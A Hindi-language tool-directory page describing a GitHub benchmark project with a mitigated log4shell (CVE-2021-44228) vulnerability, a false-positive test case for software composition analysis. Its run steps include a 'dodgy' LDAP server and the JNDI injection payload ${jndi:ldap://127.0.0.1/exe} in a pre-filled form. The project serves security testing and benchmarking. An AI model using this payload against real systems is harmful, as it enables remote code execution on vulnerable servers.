Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
l4j-fp1 — जीईई वेब प्रोजेक्ट जिसमें संशोधित log4shell (CVE-2021-44228) कमजोरी है | Kitploit
उपकरण/GitHubGitHub/scabench/l4j-fp1
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब सुरक्षाआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षा
GitHubscabench/l4j-fp1

l4j-fp1

जीईई वेब प्रोजेक्ट जिसमें संशोधित log4shell (CVE-2021-44228) कमजोरी है

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

log4shell गलत सकारात्मक

यह एक सरल वेब प्रोजेक्ट है जिसमें एक स्वच्छित log4shell कमजोरी है। अशुद्धिकृत संस्करण के लिए, देखें https://github.com/scabench/l4j-tp1/। प्रोजेक्ट एक सरल scabench.HelloWorldService गेट सेवा को परिभाषित करता है जो एक सादा टेक्स्ट स्ट्रिंग hello world लौटाता है। सेवा पैरामीटर की अपेक्षा नहीं करती है, और यदि पैरामीटर मिलते हैं, तो एक त्रुटि लॉग की जाती है।

कमजोर निर्भरता है org.apache.logging.log4j:log4j-core:2.14.1, कमजोरी है CVE-2021-44228।

स्वच्छीकरण

प्रोजेक्ट एक Amazon द्वारा बनाए गए एजेंट का उपयोग करता है जब log4shell उभरा और कोई पैच उपलब्ध नहीं था। एजेंट कमजोर वर्ग org.apache.logging.log4j.core.lookup.JndiLookup को अक्षम कर देगा।

एजेंट का उपयोग एजेंट को गतिशील रूप से स्थापित (अर्थात संलग्न) करके लागू किया जाता है जब scabench.HelloWorldService लोड होता है (क्लास के स्टैटिक ब्लॉक में), यदि यह विफल होता है, तो एप्लिकेशन क्रैश हो जाता है। इसके लिए आवश्यक है कि JVM एजेंट स्व-संलग्नता को सक्षम करे।

एप्लिकेशन चलाना

  1. JVM एजेंट स्व-संलग्नता सक्षम करें: export MAVEN_OPTS="-Djdk.attach.allowAttachSelf=true"
  2. एम्बेडेड वेब सर्वर प्रारंभ करें: mvn jetty:run
  3. शामिल ldap सर्वर प्रारंभ करें: java -jar dodgy-ldap-server.jar (कमजोर कोड इस सर्वर से जावा कोड डाउनलोड करेगा)
  4. ब्राउज़र को http://localhost:8080/ पर इंगित करें, इस साइट में एक पूर्व-भरा हुआ फॉर्म है जिसमें एक दुर्भावनापूर्ण पेलोड ${jndi:ldap://127.0.0.1/exe} है।
  5. इस फॉर्म को सबमिट करें
  6. यह सर्वर पर foo फ़ाइल नहीं बनाएगा (जैसा कि अशुद्धिकृत संस्करण करता है)

ध्यान दें कि एप्लिकेशन चलाते समय, कंसोल पर निम्न पंक्ति दिखाई देती है:

Transforming org/apache/logging/log4j/core/lookup/JndiLookup .

परीक्षण का उपयोग करके स्वच्छीकरण प्रदर्शित करना

इसके लिए unix या macos की आवश्यकता है। इस प्रोजेक्ट को windows पर पोर्ट करना आसान है। कमजोरी प्रदर्शित करने के लिए एक यूनिट परीक्षण प्रदान किया गया है, सेटअप वही है जो https://github.com/scabench/l4j-tp1/ में उपयोग किया गया है। स्वच्छीकरण के कारण, परीक्षण अब विफल होता है।

सॉफ्टवेयर संरचना विश्लेषण चलाना

विभिन्न विश्लेषण चलाने के लिए कई sh स्क्रिप्ट हैं, परिणाम रिपोर्ट scan-results में पाई जा सकती हैं।

SBOM उत्पन्न करना

pom.xml में CycloneDX प्रारूप में एक SBOM उत्पन्न करने के लिए एक प्लगइन है। ऐसा करने के लिए, mvn cyclonedx:makePackageBom चलाएं, SBOM target/ में json और xml प्रारूप में पाया जा सकता है।

टूल डाउनलोड करें